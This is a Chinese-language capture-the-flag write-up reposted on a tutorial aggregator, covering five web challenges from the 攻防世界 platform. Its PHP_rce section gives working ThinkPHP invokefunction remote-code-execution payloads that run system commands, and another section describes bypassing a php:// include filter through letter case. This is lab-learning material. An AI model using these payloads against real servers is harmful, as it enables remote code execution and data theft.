PHP   发布时间:2022-04-04  发布网站:大佬教程  code.js-code.com
大佬教程收集整理的这篇文章主要介绍了攻防世界Web进阶区题目Writeup(持续更新)大佬教程大佬觉得挺不错的,现在分享给大家,也给大家做个参考。

0x00  baby_web

  难度不大,根据题目@L_489_0@"初始页面",联想到index.PHP,但是如果在URL中直接输入index.PHP自动跳转到1.PHP,所以bp直接抓包,修改http请求就可以了.

攻防世界Web进阶区题目Writeup(持续更新)

 

   拿到flag


0x01  Training-WWW-Robots

  察到了robots协议,那么直接url输入robots.txt查看

攻防世界Web进阶区题目Writeup(持续更新)

 

   看到@L_489_0@fl0g.PHP

攻防世界Web进阶区题目Writeup(持续更新)

 

  拿到flag


 0x02  PHP_rce

  ThinkPHP框架漏洞,payload网上一大把,以后有时间会写篇文章仔细分析这个漏洞,这里不再赘述

   1.看看根目录下的文件 [?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /]

攻防世界Web进阶区题目Writeup(持续更新)

 

   2.看到flag,尝试查看内容[?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag]

攻防世界Web进阶区题目Writeup(持续更新)

 

   拿到flag.


 

0x03  Web_PHP_include

  文件包含漏洞中的任意代码执行

  进入题目给了一段代码,功能很简单,就是将page字符串中的"PHP://"关键字给替换为空,但是strstr函数对大小写敏感,所以直接大写绕过.

  

攻防世界Web进阶区题目Writeup(持续更新)

 

   查看之

  

攻防世界Web进阶区题目Writeup(持续更新)

 

   拿到flag


0x04  ics-06

  拿到题目只有"报表中心"可以点开

攻防世界Web进阶区题目Writeup(持续更新)

 

   看到[id=1]本以为是sql注入,但是尝试加引号等等操作之后没啥反应,索性上bp爆破试试看

攻防世界Web进阶区题目Writeup(持续更新)

 

 

   看到id=2333时响应长度和其他值不一样

 

@H_403_115@

 

  拿到flag


待更新----

 

大佬总结

以上是大佬教程为你收集整理的攻防世界Web进阶区题目Writeup(持续更新)全部内容,希望文章能够帮你解决攻防世界Web进阶区题目Writeup(持续更新)所遇到的程序开发问题。

如果觉得大佬教程网站内容还不错,欢迎将大佬教程推荐给程序员好友。

本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
如您有任何意见或建议可联系处理。小编QQ:384754419,请注明来意。
标签: